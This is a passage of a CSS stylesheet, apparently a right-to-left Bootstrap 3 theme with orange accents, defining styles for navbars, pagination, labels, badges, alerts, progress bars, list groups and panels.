.navbar-inverse .navbar-nav > .active > a:hover,
.navbar-inverse .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: #080808;
}
.navbar-inverse .navbar-nav > .disabled > a,
.navbar-inverse .navbar-nav > .disabled > a:hover,
.navbar-inverse .navbar-nav > .disabled > a:focus {
  color: #444444;
  background-color: transparent;
}
.navbar-inverse .navbar-nav > .open > a,
.navbar-inverse .navbar-nav > .open > a:hover,
.navbar-inverse .navbar-nav > .open > a:focus {
  color: #ffffff;
  background-color: #080808;
}
@media (max-width: 990px) {
  .navbar-inverse .navbar-nav .open .dropdown-menu > .dropdown-header {
    border-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu .divider {
    background-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a {
    color: #999999;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #444444;
    background-color: transparent;
  }
}
.navbar-inverse .navbar-toggle {
  border-color: #333333;
}
.navbar-inverse .navbar-toggle:hover,
.navbar-inverse .navbar-toggle:focus {
  background-color: #333333;
}
.navbar-inverse .navbar-toggle .icon-bar {
  background-color: #ffffff;
}
.navbar-inverse .navbar-collapse,
.navbar-inverse .navbar-form {
  border-color: #101010;
}
.navbar-inverse .navbar-link {
  color: #999999;
}
.navbar-inverse .navbar-link:hover {
  color: #ffffff;
}
.navbar-inverse .btn-link {
  color: #999999;
}
.navbar-inverse .btn-link:hover,
.navbar-inverse .btn-link:focus {
  color: #ffffff;
}
.navbar-inverse .btn-link[disabled]:hover,
fieldset[disabled] .navbar-inverse .btn-link:hover,
.navbar-inverse .btn-link[disabled]:focus,
fieldset[disabled] .navbar-inverse .btn-link:focus {
  color: #444444;
}
.breadcrumb {
  padding: 8px 15px;
  margin-bottom: 20px;
  list-style: none;
  background-color: #eeeeee;
  border-radius: 0;
}
.breadcrumb > li {
  display: inline-block;
}
.breadcrumb > li + li:before {
  padding: 0 5px;
  color: #999999;
  content: "/\00a0";
}
.breadcrumb > .active {
  color: #999999;
}
.pagination {
  display: inline-block;
  padding-right: 0;
  margin: 20px 0;
  border-radius: 0;
}
.pagination > li {
  display: inline;
}
.pagination > li > a,
.pagination > li > span {
  position: relative;
  float: right;
  padding: 6px 12px;
  margin-right: -1px;
  line-height: 1.42857143;
  color: #ff8800;
  text-decoration: none;
  background-color: #ffffff;
  border: 1px solid #dddddd;
}
.pagination > li > a:hover,
.pagination > li > span:hover,
.pagination > li > a:focus,
.pagination > li > span:focus {
  z-index: 2;
  color: #b35f00;
  background-color: #eeeeee;
  border-color: #dddddd;
}
.pagination > li:first-child > a,
.pagination > li:first-child > span {
  margin-right: 0;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.pagination > li:last-child > a,
.pagination > li:last-child > span {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.pagination > .active > a,
.pagination > .active > span,
.pagination > .active > a:hover,
.pagination > .active > span:hover,
.pagination > .active > a:focus,
.pagination > .active > span:focus {
  z-index: 3;
  color: #ffffff;
  cursor: default;
  background-color: #ff8800;
  border-color: #ff8800;
}
.pagination > .disabled > span,
.pagination > .disabled > span:hover,
.pagination > .disabled > span:focus,
.pagination > .disabled > a,
.pagination > .disabled > a:hover,
.pagination > .disabled > a:focus {
  color: #999999;
  cursor: not-allowed;
  background-color: #ffffff;
  border-color: #dddddd;
}
.pagination-lg > li > a,
.pagination-lg > li > span {
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
}
.pagination-lg > li:first-child > a,
.pagination-lg > li:first-child > span {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.pagination-lg > li:last-child > a,
.pagination-lg > li:last-child > span {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.pagination-sm > li > a,
.pagination-sm > li > span {
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
}
.pagination-sm > li:first-child > a,
.pagination-sm > li:first-child > span {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.pagination-sm > li:last-child > a,
.pagination-sm > li:last-child > span {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.pager {
  padding-right: 0;
  margin: 20px 0;
  text-align: center;
  list-style: none;
}
.pager li {
  display: inline;
}
.pager li > a,
.pager li > span {
  display: inline-block;
  padding: 5px 14px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 15px;
}
.pager li > a:hover,
.pager li > a:focus {
  text-decoration: none;
  background-color: #eeeeee;
}
.pager .next > a,
.pager .next > span {
  float: left;
}
.pager .previous > a,
.pager .previous > span {
  float: right;
}
.pager .disabled > a,
.pager .disabled > a:hover,
.pager .disabled > a:focus,
.pager .disabled > span {
  color: #999999;
  cursor: not-allowed;
  background-color: #ffffff;
}
.label {
  display: inline;
  padding: .2em .6em .3em;
  font-size: 75%;
  font-weight: 700;
  line-height: 1;
  color: #ffffff;
  text-align: center;
  white-space: nowrap;
  vertical-align: baseline;
  border-radius: .25em;
}
a.label:hover,
a.label:focus {
  color: #ffffff;
  text-decoration: none;
  cursor: pointer;
}
.label:empty {
  display: none;
}
.btn .label {
  position: relative;
  top: -1px;
}
.label-default {
  background-color: #999999;
}
.label-default[href]:hover,
.label-default[href]:focus {
  background-color: #808080;
}
.label-primary {
  background-color: #ff8800;
}
.label-primary[href]:hover,
.label-primary[href]:focus {
  background-color: #cc6d00;
}
.label-success {
  background-color: #3e9b52;
}
.label-success[href]:hover,
.label-success[href]:focus {
  background-color: #2f773f;
}
.label-info {
  background-color: #0099cc;
}
.label-info[href]:hover,
.label-info[href]:focus {
  background-color: #007399;
}
.label-warning {
  background-color: #ff8800;
}
.label-warning[href]:hover,
.label-warning[href]:focus {
  background-color: #cc6d00;
}
.label-danger {
  background-color: #cc0000;
}
.label-danger[href]:hover,
.label-danger[href]:focus {
  background-color: #990000;
}
.badge {
  display: inline-block;
  min-width: 10px;
  padding: 3px 7px;
  font-size: 12px;
  font-weight: bold;
  line-height: 1;
  color: #ffffff;
  text-align: center;
  white-space: nowrap;
  vertical-align: middle;
  background-color: #999999;
  border-radius: 0;
}
.badge:empty {
  display: none;
}
.btn .badge {
  position: relative;
  top: -1px;
}
.btn-xs .badge,
.btn-group-xs > .btn .badge {
  top: 0;
  padding: 1px 5px;
}
a.badge:hover,
a.badge:focus {
  color: #ffffff;
  text-decoration: none;
  cursor: pointer;
}
.list-group-item.active > .badge,
.nav-pills > .active > a > .badge {
  color: #ff8800;
  background-color: #ffffff;
}
.list-group-item > .badge {
  float: left;
}
.list-group-item > .badge + .badge {
  margin-left: 5px;
}
.nav-pills > li > a > .badge {
  margin-right: 3px;
}
.jumbotron {
  padding-top: 40px;
  padding-bottom: 40px;
  margin-bottom: 40px;
  color: inherit;
  background-color: #eeeeee;
}
.jumbotron h1,
.jumbotron .h1 {
  color: inherit;
}
.jumbotron p {
  margin-bottom: 20px;
  font-size: 21px;
  font-weight: 200;
}
.jumbotron > hr {
  border-top-color: #d5d5d5;
}
.container .jumbotron,
.container-fluid .jumbotron {
  padding-left: 20px;
  padding-right: 20px;
  border-radius: 0;
}
.jumbotron .container {
  max-width: 100%;
}
@media screen and (min-width: 768px) {
  .jumbotron {
    padding-top: 64px;
    padding-bottom: 64px;
  }
  .container .jumbotron,
  .container-fluid .jumbotron {
    padding-left: 80px;
    padding-right: 80px;
  }
  .jumbotron h1,
  .jumbotron .h1 {
    font-size: 63px;
  }
}
.thumbnail {
  display: block;
  padding: 4px;
  margin-bottom: 20px;
  line-height: 1.42857143;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0;
  -webkit-transition: border 0.2s ease-in-out;
  -o-transition: border 0.2s ease-in-out;
  transition: border 0.2s ease-in-out;
}
.thumbnail > img,
.thumbnail a > img {
  margin-left: auto;
  margin-right: auto;
}
a.thumbnail:hover,
a.thumbnail:focus,
a.thumbnail.active {
  border-color: #ff8800;
}
.thumbnail .caption {
  padding: 10px;
  color: #444444;
}
.alert {
  padding: 15px;
  margin-bottom: 20px;
  border: 1px solid transparent;
  border-radius: 0;
}
.alert h4 {
  margin-top: 0;
  color: inherit;
}
.alert .alert-link {
  font-weight: bold;
}
.alert > p,
.alert > ul {
  margin-bottom: 0;
}
.alert > p + p {
  margin-top: 5px;
}
.alert-dismissable,
.alert-dismissible {
  padding-left: 35px;
}
.alert-dismissable .close,
.alert-dismissible .close {
  position: relative;
  top: -2px;
  left: -21px;
  color: inherit;
}
.alert-success {
  color: #468847;
  background-color: #dff0d8;
  border-color: #d6e9c6;
}
.alert-success hr {
  border-top-color: #c9e2b3;
}
.alert-success .alert-link {
  color: #356635;
}
.alert-info {
  color: #3a87ad;
  background-color: #d9edf7;
  border-color: #bce8f1;
}
.alert-info hr {
  border-top-color: #a6e1ec;
}
.alert-info .alert-link {
  color: #2d6987;
}
.alert-warning {
  color: #c09853;
  background-color: #fcf8e3;
  border-color: #faebcc;
}
.alert-warning hr {
  border-top-color: #f7e1b5;
}
.alert-warning .alert-link {
  color: #a47e3c;
}
.alert-danger {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #ebccd1;
}
.alert-danger hr {
  border-top-color: #e4b9c0;
}
.alert-danger .alert-link {
  color: #953b39;
}
@-webkit-keyframes progress-bar-stripes {
  from {
    background-position: 40px 0;
  }
  to {
    background-position: 100% 0;
  }
}
@keyframes progress-bar-stripes {
  from {
    background-position: 40px 0;
  }
  to {
    background-position: 100% 0;
  }
}
.progress {
  height: 20px;
  margin-bottom: 20px;
  overflow: hidden;
  background-color: #f5f5f5;
  border-radius: 0;
  -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
  box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
}
.progress-bar {
  float: right;
  width: 0%;
  height: 100%;
  font-size: 12px;
  line-height: 20px;
  color: #ffffff;
  text-align: center;
  background-color: #ff8800;
  -webkit-box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
  box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
  -webkit-transition: width 0.6s ease;
  -o-transition: width 0.6s ease;
  transition: width 0.6s ease;
}
.progress-striped .progress-bar,
.progress-bar-striped {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-size: 40px 40px;
}
.progress.active .progress-bar,
.progress-bar.active {
  -webkit-animation: progress-bar-stripes 2s linear infinite;
  -o-animation: progress-bar-stripes 2s linear infinite;
  animation: progress-bar-stripes 2s linear infinite;
}
.progress-bar-success {
  background-color: #3e9b52;
}
.progress-striped .progress-bar-success {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-info {
  background-color: #0099cc;
}
.progress-striped .progress-bar-info {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-warning {
  background-color: #ff8800;
}
.progress-striped .progress-bar-warning {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-danger {
  background-color: #cc0000;
}
.progress-striped .progress-bar-danger {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.media {
  margin-top: 15px;
}
.media:first-child {
  margin-top: 0;
}
.media,
.media-body {
  overflow: hidden;
  zoom: 1;
}
.media-body {
  width: 10000px;
}
.media-object {
  display: block;
}
.media-object.img-thumbnail {
  max-width: none;
}
.media-right,
.media > .pull-right {
  padding-right: 10px;
}
.media-left,
.media > .pull-left {
  padding-left: 10px;
}
.media-left,
.media-right,
.media-body {
  display: table-cell;
  vertical-align: top;
}
.media-middle {
  vertical-align: middle;
}
.media-bottom {
  vertical-align: bottom;
}
.media-heading {
  margin-top: 0;
  margin-bottom: 5px;
}
.media-list {
  padding-right: 0;
  list-style: none;
}
.list-group {
  padding-right: 0;
  margin-bottom: 20px;
}
.list-group-item {
  position: relative;
  display: block;
  padding: 10px 15px;
  margin-bottom: -1px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
}
.list-group-item:first-child {
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.list-group-item:last-child {
  margin-bottom: 0;
  border-bottom-left-radius: 0;
  border-bottom-right-radius: 0;
}
.list-group-item.disabled,
.list-group-item.disabled:hover,
.list-group-item.disabled:focus {
  color: #999999;
  cursor: not-allowed;
  background-color: #eeeeee;
}
.list-group-item.disabled .list-group-item-heading,
.list-group-item.disabled:hover .list-group-item-heading,
.list-group-item.disabled:focus .list-group-item-heading {
  color: inherit;
}
.list-group-item.disabled .list-group-item-text,
.list-group-item.disabled:hover .list-group-item-text,
.list-group-item.disabled:focus .list-group-item-text {
  color: #999999;
}
.list-group-item.active,
.list-group-item.active:hover,
.list-group-item.active:focus {
  z-index: 2;
  color: #ffffff;
  background-color: #ff8800;
  border-color: #ff8800;
}
.list-group-item.active .list-group-item-heading,
.list-group-item.active:hover .list-group-item-heading,
.list-group-item.active:focus .list-group-item-heading,
.list-group-item.active .list-group-item-heading > small,
.list-group-item.active:hover .list-group-item-heading > small,
.list-group-item.active:focus .list-group-item-heading > small,
.list-group-item.active .list-group-item-heading > .small,
.list-group-item.active:hover .list-group-item-heading > .small,
.list-group-item.active:focus .list-group-item-heading > .small {
  color: inherit;
}
.list-group-item.active .list-group-item-text,
.list-group-item.active:hover .list-group-item-text,
.list-group-item.active:focus .list-group-item-text {
  color: #ffe7cc;
}
a.list-group-item,
button.list-group-item {
  color: #555555;
}
a.list-group-item .list-group-item-heading,
button.list-group-item .list-group-item-heading {
  color: #333333;
}
a.list-group-item:hover,
button.list-group-item:hover,
a.list-group-item:focus,
button.list-group-item:focus {
  color: #555555;
  text-decoration: none;
  background-color: #f5f5f5;
}
button.list-group-item {
  width: 100%;
  text-align: right;
}
.list-group-item-success {
  color: #468847;
  background-color: #dff0d8;
}
a.list-group-item-success,
button.list-group-item-success {
  color: #468847;
}
a.list-group-item-success .list-group-item-heading,
button.list-group-item-success .list-group-item-heading {
  color: inherit;
}
a.list-group-item-success:hover,
button.list-group-item-success:hover,
a.list-group-item-success:focus,
button.list-group-item-success:focus {
  color: #468847;
  background-color: #d0e9c6;
}
a.list-group-item-success.active,
button.list-group-item-success.active,
a.list-group-item-success.active:hover,
button.list-group-item-success.active:hover,
a.list-group-item-success.active:focus,
button.list-group-item-success.active:focus {
  color: #fff;
  background-color: #468847;
  border-color: #468847;
}
.list-group-item-info {
  color: #3a87ad;
  background-color: #d9edf7;
}
a.list-group-item-info,
button.list-group-item-info {
  color: #3a87ad;
}
a.list-group-item-info .list-group-item-heading,
button.list-group-item-info .list-group-item-heading {
  color: inherit;
}
a.list-group-item-info:hover,
button.list-group-item-info:hover,
a.list-group-item-info:focus,
button.list-group-item-info:focus {
  color: #3a87ad;
  background-color: #c4e3f3;
}
a.list-group-item-info.active,
button.list-group-item-info.active,
a.list-group-item-info.active:hover,
button.list-group-item-info.active:hover,
a.list-group-item-info.active:focus,
button.list-group-item-info.active:focus {
  color: #fff;
  background-color: #3a87ad;
  border-color: #3a87ad;
}
.list-group-item-warning {
  color: #c09853;
  background-color: #fcf8e3;
}
a.list-group-item-warning,
button.list-group-item-warning {
  color: #c09853;
}
a.list-group-item-warning .list-group-item-heading,
button.list-group-item-warning .list-group-item-heading {
  color: inherit;
}
a.list-group-item-warning:hover,
button.list-group-item-warning:hover,
a.list-group-item-warning:focus,
button.list-group-item-warning:focus {
  color: #c09853;
  background-color: #faf2cc;
}
a.list-group-item-warning.active,
button.list-group-item-warning.active,
a.list-group-item-warning.active:hover,
button.list-group-item-warning.active:hover,
a.list-group-item-warning.active:focus,
button.list-group-item-warning.active:focus {
  color: #fff;
  background-color: #c09853;
  border-color: #c09853;
}
.list-group-item-danger {
  color: #b94a48;
  background-color: #f2dede;
}
a.list-group-item-danger,
button.list-group-item-danger {
  color: #b94a48;
}
a.list-group-item-danger .list-group-item-heading,
button.list-group-item-danger .list-group-item-heading {
  color: inherit;
}
a.list-group-item-danger:hover,
button.list-group-item-danger:hover,
a.list-group-item-danger:focus,
button.list-group-item-danger:focus {
  color: #b94a48;
  background-color: #ebcccc;
}
a.list-group-item-danger.active,
button.list-group-item-danger.active,
a.list-group-item-danger.active:hover,
button.list-group-item-danger.active:hover,
a.list-group-item-danger.active:focus,
button.list-group-item-danger.active:focus {
  color: #fff;
  background-color: #b94a48;
  border-color: #b94a48;
}
.list-group-item-heading {
  margin-top: 0;
  margin-bottom: 5px;
}
.list-group-item-text {
  margin-bottom: 0;
  line-height: 1.3;
}
.panel {
  margin-bottom: 20px;
  background-color: #ffffff;
  border: 1px solid transparent;
  border-radius: 0;
  -webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05);
  box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05);
}
.panel-body {
  padding: 15px;
}
.panel-heading {
  padding: 10px 15px;
  border-bottom: 1px solid transparent;
  border-top-right-radius: -1;
  border-top-left-radius: -1;
}
.panel-heading > .dropdown .dropdown-toggle {
  color: inherit;
}
.panel-title {
  margin-top: 0;
  margin-bottom: 0;
  font-size: 16px;
  color: inherit;
}
.panel-title > a,
.panel-title > small,
.panel-title > .small,
.panel-title > small > a,
.panel-title > .small > a {
  color: inherit;
}
.panel-footer {
  padding: 10px 15px;
  background-color: #f5f5f5;
  border-top: 1px solid #dddddd;
  border-bottom-left-radius: -1;
  border-bottom-right-radius: -1;
}
.panel > .list-group,
.panel > .panel-collapse > .list-group {
  margin-bottom: 0;
}
.panel > .list-group .list-group-item,
.panel > .panel-collapse > .list-group .list-group-item {
  border-width: 1px 0;
  border-radius: 0;
}
.panel > .list-group:first-child .list-group-item:first-child,
.panel > .panel-collapse > .list-group:first-child .list-group-item:first-child {
  border-top: 0;
  border-top-right-radius: -1;
  border-top-left-radius: -1;
}
.panel > .list-group:last-child .list-group-item:last-child,
.panel > .panel-collapse > .list-group:last-child .list-group-item:last-child {
  border-bottom: 0;
  border-bottom-left-radius: -1;
  border-bottom-right-radius: -1;
}
.panel > .panel-heading + .panel-collapse > .list-group .list-group-item:first-child {
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.panel-heading + .list-group .list-group-item:first-child {
  border-top-width: 0;
}
.list-group + .panel-footer {
  border-top-width: 0;
}
.panel > .table,
.panel > .table-responsive > .table,
.panel > .panel-collapse > .table {
  margin-bottom: 0;
}
.panel > .table caption,
.panel > .table-responsive > .table caption,
.panel > .panel-collapse > .table caption {
  padding-left: 15px;
  padding-right: 15px;
}
.panel > .table:first-child,
.panel > .table-responsive:first-child > .table:first-child {
  border-top-right-radius: -1;
  border-top-left-radius: -1;
}
.panel > .table:first-child > thead:first-child > tr:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child {
  border-top-right-radius: -1;
  border-top-left-radius: -1;
}
.panel > .table:first-child > thead:first-child > tr:first-child td:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child td:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:first-child,
.panel > .table:first-child > thead:first-child > tr:first-child th:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child th:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:first-child {
  border-top-right-radius: -1;
}
.panel > .table:first-child > thead:first-child > tr:first-child td:last-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:last-child,
.panel > .table:first-child > tbody:first-child > tr:first-child td:last-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:last-child,
.panel > .table:first-child > thead:first-child > tr:first-child th:last-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:last-child,
.panel > .table:first-child > tbody:first-child > tr:first-child th:last-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:last-child {
  border-top-left-radius: -1;
}
.panel > .table:last-child,
.panel > .table-responsive:last-child > .table:last-child {
  border-bottom-left-radius: -1;
  border-bottom-right-radius: -1;
}
.panel > .table:last-child > tbody:last-child > tr:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child {
  border-bottom-left-radius: -1;
  border-bottom-right-radius: -1;
}
.panel > .table:last-child > tbody:last-child > tr:last-child td:first-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:first-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child td:first-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:first-child,
.panel > .table:last-child > tbody:last-child > tr:last-child th:first-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:first-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child th:first-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:first-child {
  border-bottom-right-radius: -1;
}
.panel > .table:last-child > tbody:last-child > tr:last-child td:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child td:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:last-child,
.panel > .table:last-child > tbody:last-child > tr:last-child th:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child th:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:last-child {
  border-bottom-left-radius: -1;
}
.panel > .panel-body + .table,
.panel > .panel-body + .table-responsive,
.panel > .table + .panel-body,
.panel > .table-responsive + .panel-body {
  border-top: 1px solid #dddddd;
}
.panel > .table > tbody:first-child > tr:first-child th,
.panel > .table > tbody:first-child > tr:first-child td {
  border-top: 0;
}
.panel > .table-bordered,
.panel > .table-responsive > .table-bordered {
  border: 0;
}
.panel > .table-bordered > thead > tr > th:first-child,
.panel > .table-responsive > .table-bordered > thead > tr > th:first-child,
.panel > .table-bordered > tbody > tr > th:first-child,
.panel > .table-responsive > .table-bordered > tbody > tr > th:first-child,
.panel > .table-bordered > tfoot > tr > th:first-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > th:first-child,
.panel > .table-bordered > thead > tr > td:first-child,
.panel > .table-responsive > .table-bordered > thead > tr > td:first-child,
.panel > .table-bordered > tbody > tr > td:first-child,
.panel > .table-responsive > .table-bordered > tbody > tr > td:first-child,
.panel > .table-bordered > tfoot > tr > td:first-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > td:first-child {
  border-right: 0;
}
.panel > .table-bordered > thead > tr > th:last-child,
.panel > .table-responsive > .table-bordered > thead > tr > th:last-child,
.panel > .table-bordered > tbody > tr > th:last-child,
.panel > .table-responsive > .table-bordered > tbody > tr > th:last-child,
.panel > .table-bordered > tfoot > tr > th:last-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > th:last-child,
.panel > .table-bordered > thead > tr > td:last-child,
.panel > .table-responsive > .table-bordered > thead > tr > td:last-child,
.panel > .table-bordered > tbody > tr > td:last-child,
.panel > .table-responsive > .table-bordered > tbody > tr > td:last-child,
.panel > .table-bordered > tfoot > tr > td:last-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > td:last-child {
  border-left: 0;
}
.panel > .table-bordered > thead > tr:first-child > td,
.panel > .table-responsive > .table-bordered > thead > tr:first-child > td,
.panel > .table-bordered > tbody > tr:first-child > td,
.panel > .table-responsive > .table-bordered > tbody > tr:first-child > td,
.panel > .table-bordered > thead > tr:first-child > th,
.panel > .table-responsive > .table-bordered > thead > tr:first-child > th,
.panel > .table-bordered > tbody > tr:first-child > th,
.panel > .table-responsive > .table-bordered > tbody > tr:first-child > th {
  border-bottom: 0;
}
.panel > .table-bordered > tbody > tr:last-child > td,
.panel > .table-responsive > .table-bordered > tbody > tr:last-child > td,
.panel > .table-bordered > tfoot > tr:last-child > td,
.panel > .table-responsive > .table-bordered > tfoot > tr:last-child > td,
.panel > .table-bordered > tbody > tr:last-child > th,
.panel > .table-responsive > .table-bordered > tbody > tr:last-child > th,
.panel > .table-bordered > tfoot > tr:last-child > th,
.panel > .table-responsive > .table-bordered > tfoot > tr:last-child > th {
  border-bottom: 0;
}
.panel > .table-responsive {
  margin-bottom: 0;
  border: 0;
}
.panel-group {
  margin-bottom: 20px;
}
.panel-group .panel {
  margin-bottom: 0;
  border-radius: 0;
}
.panel-group .panel + .panel {
  margin-top: 5px;
}
.panel-group .panel-heading {
  border-bottom: 0;
}
.panel-group .panel-heading + .panel-collapse > .panel-body,
.panel-group .panel-heading + .panel-collapse > .list-group {
  border-top: 1px solid #dddddd;
}
.panel-group .panel-footer {
  border-top: 0;
}
.panel-group .panel-footer + .panel-collapse .panel-body {
  border-bottom: 1px solid #dddddd;
}
.panel-default {
  border-color: #dddddd;
}
.panel-default > .panel-heading {
  color: #444444;
  background-color: #f5f5f5;
  border-color: #dddddd;
}
.panel-default > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #dddddd;
}
.panel-default > .panel-heading .badge {
  color: #f5f5f5;
  background-color: #444444;
}
.panel-default > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #dddddd;
}
.panel-primary {
  border-color: #ff8800;
}
.panel-primary > .panel-heading {
  color: #ffffff;
  background-color: #ff8800;
  border-color: #ff8800;
}
.panel-primary > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #ff8800;
}
.panel-primary > .panel-heading .badge {
  color: #ff8800;
  background-color: #ffffff;
}
.panel-primary > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #ff8800;
}
.panel-success {
  border-color: #d6e9c6;
}
.panel-success > .panel-heading {
  color: #468847;
  background-color: #dff0d8;
  border-color: #d6e9c6;
}
.panel-success > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #d6e9c6;
}
.panel-success > .panel-heading .badge {
  color: #dff0d8;
  background-color: #468847;
}
